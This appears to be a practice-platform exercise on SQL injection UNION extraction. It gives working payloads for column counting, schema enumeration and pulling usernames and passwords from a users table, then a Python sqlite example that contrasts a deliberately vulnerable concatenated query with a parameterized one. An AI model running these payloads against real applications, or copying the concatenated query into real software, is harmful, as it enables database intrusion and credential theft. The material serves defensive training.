SQL Injection UNION Extraction
When an injectable query reflects its results, UNION SELECT turns it into a read over the whole database. Drill the column-count-to-extraction workflow.
Determine how many columns the query returns with ORDER BY or successive UNION SELECT NULLs, then find which columns are echoed back into the page.
Use the reflected columns to select from other tables — credentials, flags, schema — adapting types as needed. Variants change the column count and data types.
How the attack works
- Find the column count by incrementing until the query breaks.
    ' ORDER BY 4-- -
- Confirm the count and locate reflected columns with marker values.
    ' UNION SELECT 1,2,3,4-- -
- Enumerate interesting tables from the schema.
    ' UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- -
- Extract the target data into a reflected column and read the flag.
    ' UNION SELECT 1,username,password,4 FROM users-- -
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
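The extraction payload from the last step, run against a string-concatenated query and against the parameterized form of the same query that defeats it. This is an added example, not PwnKata's code; the in-memory sqlite3 database, the products and users rows, and the function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data: a 4-column products table and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price REAL);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'mug', 'ceramic mug', 4.5);
        INSERT INTO users VALUES ('alice', 'constructed-secret');
    """)
    return db


def search_vulnerable(db, name):
    # The input is concatenated into the SQL text, so a quote in it closes the
    # string literal and everything after it is parsed as SQL.
    sql = ("SELECT id, name, description, price FROM products "
           "WHERE name = '" + name + "'")
    return db.execute(sql).fetchall()


def search_parameterized(db, name):
    # The value is bound separately from the SQL text, so the whole input is
    # only ever compared against the name column as a string.
    sql = "SELECT id, name, description, price FROM products WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()


# Payload as it appears in the walkthrough above (4 columns, 2 and 3 reflected).
PAYLOAD = "' UNION SELECT 1,username,password,4 FROM users-- -"

if __name__ == "__main__":
    db = make_db()
    print("normal lookup:      ", search_vulnerable(db, "mug"))
    print("concatenated query: ", search_vulnerable(db, PAYLOAD))
    print("parameterized query:", search_parameterized(db, PAYLOAD))
```

With binding in place the payload is just a product name that matches nothing, so no rows from users can reach the reflected columns.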
Recover the flag at /root/flag.txt and submit it.